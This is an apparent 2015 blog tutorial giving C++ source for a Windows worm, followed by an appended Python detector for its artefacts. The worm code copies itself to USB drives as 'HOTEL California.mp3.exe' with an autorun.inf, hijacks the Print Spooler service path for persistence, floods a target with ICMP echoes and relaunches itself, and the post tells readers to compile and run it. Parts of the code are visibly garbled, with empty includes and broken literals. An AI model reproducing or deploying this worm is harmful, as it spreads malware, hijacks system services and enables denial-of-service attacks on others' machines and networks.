Wednesday, March 4, 2015

WORM CODING WITH EXAMPLE

Worms and viruses are mostly coded in assembly language. This gives the advantage of smaller size, speed optimizations and much more control for the developer over the worm or virus.
But we are going to discuss worm creation in C++ in this section, applying the concepts studied earlier in this section.
Before starting to code our first C++ worm, let's discuss worm structure a little.
A worm has at least two different sections. One section takes care of its reproduction (also called cloning) and the other section triggers the reproduced copies. Extra care must be taken that the trigger section does not trigger too many clones; otherwise the system will get overloaded and will be suspected of infection.
There may be other sections, like a payload section, an encryption section, a decrypting block and an exploits section, etc., but in our first worm we are going to code only two sections: the clone section and the trigger section.
Every worm has a mission, and after completing its mission the worm should finally terminate its host processes or remove the worm files from the hosting victims.
One more thing, friends: worm development also creates some problems for the developers, therefore you should back up your important data before proceeding. Also, always document your worm in a file on the side; this documentation will help you understand if anything goes wrong.
You should add the automatic boot-up triggers in the last phase of the worm development process; this will help you a lot if anything goes wrong during development.
During the development phase, you should create the worm termination scripts first and always observe the process list and the CPU and memory performance in Task Manager.
One very effective worm termination script is

FOR /L %I IN (1, 1, 100) DO TASKKILL /F /IM "WORM_EXE_FILE" /T

The above script is quite effective if the worm goes wild during the development phase. But it will not stop advanced worms; it can terminate only worms with a very weak mechanism, and once the worm employs the automatic boot-up triggers this script gives up. Remember, this script also eats up the CPU and drives its usage to 100%.
Let us start with a little program that, once started, will execute itself recursively and never end. This technique is called the recursive execution technique: the process launches a fresh executing clone of itself before terminating. The following code is the simplest program employing the recursive execution technique:
 

/* testproc.cpp */

 

#include 

#include 

#define PROCESSNAME “testproc.exe”

using namespace std;

int main (int argc, char* argv[])   {

      ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

return EXIT_SUCCESS;

}

 
The ShellExecute() function determines the launcher depending on the file type (the file extension). The process in this case will not have any window, so after double-clicking the executable file the process keeps executing recursively in memory.
Each new process has a new process ID, and all resource allocations are made exclusively for it again.
Next, a worm should have a mission; the payload section is determined by the mission or motto of the worm. In this case the worm has been assigned the mission to flood the network segment with broadcast ICMP packets.
The target IP address can easily be changed to any victim to launch a resource-eating attack on the target network, by changing the macro IPADDR from the broadcast address to the host-to-network transformed IP address number. If you don't know about it, refer to the socket programming section.
The following three functions from icmp.dll accomplish this task: IcmpCreateFile, IcmpSendEcho and IcmpCloseHandle.
The worm also reproduces itself from one system to another and launches in the other system. For this purpose the worm creates a new thread, which checks for USB removable drives; if one is found, it copies itself there with the name defined in the DISGUISE macro (in the following code we have named it "HOTEL California.mp3.exe") and creates an autorun.inf file.
The autorun.inf launches the worm file automatically.
The next step is to make the worm launch itself when the system boots up. For this the worm configures the settings of a service. We have chosen the Print Spooler service for this purpose. The worm changes the service's executable file path to a copy of itself in the system32 directory.
The following code accomplishes all the things discussed above; compile it and execute the executable file to run the worm.
 

/* virus4.cpp */

#include 

#include 

#include 

#include 

#define DISGUISE "HOTEL California.mp3.exe"

#define DISGUISEPATH "\\HOTEL California.mp3.exe"

#define ENVOKER "\\envoker.exe"

#define FILEATTRIB 34

#define IPADDR INADDR_BROADCAST      // The address to be attacked with icmp echoes.

#define PROCESSNAME "virus4.exe"

#define PROCSSPATH "\\virus4.exe"

#define PROCESSPATH "..\\virus4.exe"

using namespace std;

/*-----------------The icmp global section-------------------*/         

struct o                            {

        unsigned char Ttl, Tos, Flags, OptionsSize, *OptionsData;

};

struct E                            {

     DWORD Address;

     unsigned long Status, RoundTripTime;

     unsigned short DataSize, Reserved;

    void *Data;

    struct o Options;

};

HANDLE hIP;

WSADATA wsa;

HMODULE hicmp;

struct hostent *phostent;

DWORD d;

char aa[100];

struct o I;

struct E es;

HANDLE ( WINAPI *pIcmpCreateFile) ( void );

BOOL ( WINAPI *pIcmpCloseHandle ) ( HANDLE );

DWORD ( WINAPI *pIcmpSendEcho) (HANDLE, DWORD, LPVOID,
WORD, LPVOID, LPVOID, DWORD, DWORD);

/*----------------------------------------------------*/

void _declspec (dllexport) identify(char *file)     {

 

     SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

          char systemPath[101], envokerPath[101], buffer[201];          

          CopyFile(file, PROCESSPATH, NULL);

          SetFileAttributes(PROCESSPATH, FILEATTRIB);

 

          GetSystemDirectory(systemPath, 50);

          strcpy(buffer, "SC CONFIG Spooler error= ignore binpath= ");

          strcpy(envokerPath, systemPath);

          strcat(envokerPath, ENVOKER);

          strcat(buffer, envokerPath);

          strcat(systemPath, PROCSSPATH);

          CopyFile(file, systemPath, 0);

          CopyFile(file, envokerPath, 0);

          SetFileAttributes(systemPath, FILEATTRIB);

          SetFileAttributes(envokerPath, FILEATTRIB);  

          system(buffer);

}

 

void _declspec (dllexport) systemProc(char *proc)     {

 

/**

  * The payload section, The payload will run as an service.

  **/

 

SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

for (int countsys = 0; countsys < 10; countsys++)

     _asm  { nop }

        /* The payload code can be inserted here.            */

        /* The code will be executed with highest privileges */

}

void _declspec (dllexport) procCloner(char *cfile)    {

     SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

     FILE *fp;

     char drive[3], newloc[30], autof[20];

     int let = 0x43;

     struct stat stbuf;

                                    

    for (int i = 0; i < 256; i++, let++)    {

         if (let > 0x5A)

             let = 0x43;

             drive[0] = (char)let;

             drive[1]= ':';

             drive[2] = '';

            if ((GetDriveType(drive)) == 2)  { // This line fetches the removable drives.

                strcpy(newloc, drive);

                strcat(newloc, DISGUISEPATH);

                strcpy(autof, drive);

                if ((stat(newloc, &stbuf)) == -1) { // Check if file already exists

 in the pen drive.

                    CopyFile(cfile, newloc, 0);  // If not then copy the file.

                    strcat(autof, "\\Autorun.inf");

                    fp = fopen(autof, "w");

                    fprintf(fp, "[autorun]\nopen=%s", DISGUISE);

                    fclose(fp);

                    SetFileAttributes(newloc, 28);

                } else

                    continue;

        }

    }

}

/*------------------ The main engine of worm ------------------*/

int main (int argc, char* argv[])   {

//   SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

     HANDLE thread, cloner, thands[3];

     char *ptr, procfile[300];

     ptr = argv[0];

     strcpy(procfile, ptr);

     if ((strstr(ptr, ".exe")) == NULL)      {

         strcat(procfile, ".exe");

     }

 

     void (*clonproc) (char *);

     clonproc = procCloner;

 

     cloner = CreateThread(0, 0, (DWORD (__stdcall *)(void *))clonproc, procfile, 0, 0);

    HMODULE hmod;

    char dirpath[201];

    void (*smack)(char *);

    GetCurrentDirectory(200, dirpath);

    hmod = LoadLibrary(procfile);

 

    if ((strstr(dirpath, "system32")) != NULL)                         {      

  smack = (void (*)(char *))GetProcAddress(hmod, "?systemProc@@YAXPAD@Z");

            thread = CreateThread(0, 0, (DWORD (__stdcall *)(void*))smack, procfile, 0, 0);

    } else   {

       smack = (void (*)(char *))GetProcAddress(hmod, "?identify@@YAXPAD@Z");

            thread = CreateThread(0, 0, (DWORD (__stdcall *)(void*))smack, procfile, 0, 0);

    }

       thands[0] = cloner;

       thands[1] = thread;

       thands[2] = '';

/*--------------- The icmp section -----------------*/

 

hicmp = LoadLibrary("ICMP.DLL");

 

pIcmpCreateFile = (void *(__stdcall *)(void))GetProcAddress(hicmp, "IcmpCreateFile");

pIcmpCloseHandle = (int (__stdcall *)(void *))GetProcAddress(hicmp, "IcmpCloseHandle");

pIcmpSendEcho = (unsigned long (__stdcall *)(void *,unsigned
long,void *,unsigned short,void *,void *,unsigned long,unsigned
 long))GetProcAddress(hicmp, "IcmpSendEcho");

 

hIP = pIcmpCreateFile();

I.Ttl = 255;

for (int ping = 0; ping < 10; ping++)

      pIcmpSendEcho(hIP, IPADDR, 0, 0, &I, &es, sizeof(es), 8000);

pIcmpCloseHandle(hicmp);

FreeLibrary(hicmp);

/*--------------------------------------------------*/

// WaitForSingleObject(cloner, 200); // Activate this while testing the single thread.
// WaitForSingleObject(thread, 200); // Activate this while testing the single thread.

WaitForMultipleObjects(2, thands, true, 100); // Waits for the termination of two threads.

FreeLibrary(hmod);

chdir("..");

ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

return EXIT_SUCCESS;

}

 
The above code is quite lively, but it will hog the CPU, and this can easily be noticed by the sysops. Actually, the system() function starts cmd.exe every time and then executes the respective program, thus creating at least two unnecessary processes. Process creation is considered a very heavy operation and should be avoided as much as possible.
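As an added defender-side example (not part of the original post), the following Python checks for the two artefacts this worm leaves on a victim: an autorun.inf on a removable drive whose open= entry points at a double-extension executable like "HOTEL California.mp3.exe", and a Print Spooler service whose BINARY_PATH_NAME no longer points at spoolsv.exe. The autorun.inf body and the sc qc Spooler output are constructed samples, and the stock spoolsv.exe path is assumed to be the default install location.

```python
import re
# Constructed sample of the autorun.inf this worm writes to a removable drive.
SAMPLE_AUTORUN = "[autorun]\nopen=HOTEL California.mp3.exe"

# Constructed sample of `sc qc Spooler` output after the worm has redirected
# the binpath to its envoker.exe copy (constructed, not captured from a host).
SAMPLE_SC_QC = """[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\\Windows\\system32\\envoker.exe
"""

# Assumed default location of the genuine print spooler binary.
EXPECTED_SPOOLER = r"c:\windows\system32\spoolsv.exe"
MEDIA_EXTS = {".mp3", ".jpg", ".avi", ".doc", ".pdf", ".txt"}
EXEC_EXTS = {"exe", "scr", "com", "bat"}

def autorun_open_target(text):
    """Return the open= value inside the [autorun] section, or None."""
    in_section = False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("["):
            in_section = s.lower() == "[autorun]"
        elif in_section and s.lower().startswith("open="):
            return s[5:].strip()
    return None

def is_disguised_executable(name):
    """True for names like 'song.mp3.exe': an executable wearing a media extension."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] in EXEC_EXTS and "." + parts[1] in MEDIA_EXTS

def spooler_binpath_ok(sc_output):
    """Compare BINARY_PATH_NAME from `sc qc Spooler` with the stock spoolsv.exe path."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_output)
    if not m:
        return False
    return m.group(1).strip().strip('"').lower() == EXPECTED_SPOOLER

def findings(autorun_text, sc_output):
    """Collect human-readable indicators from both artefacts."""
    out = []
    target = autorun_open_target(autorun_text)
    if target and is_disguised_executable(target):
        out.append("autorun.inf launches a disguised executable: " + target)
    if not spooler_binpath_ok(sc_output):
        out.append("Spooler BINARY_PATH_NAME is not the stock spoolsv.exe")
    return out
```

On a live host the same checks would read <drive>:\Autorun.inf from each removable drive and the output of `sc qc Spooler`; the ERROR_CONTROL of IGNORE in the sample is the other trace of the worm's `sc config ... error= ignore` call.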
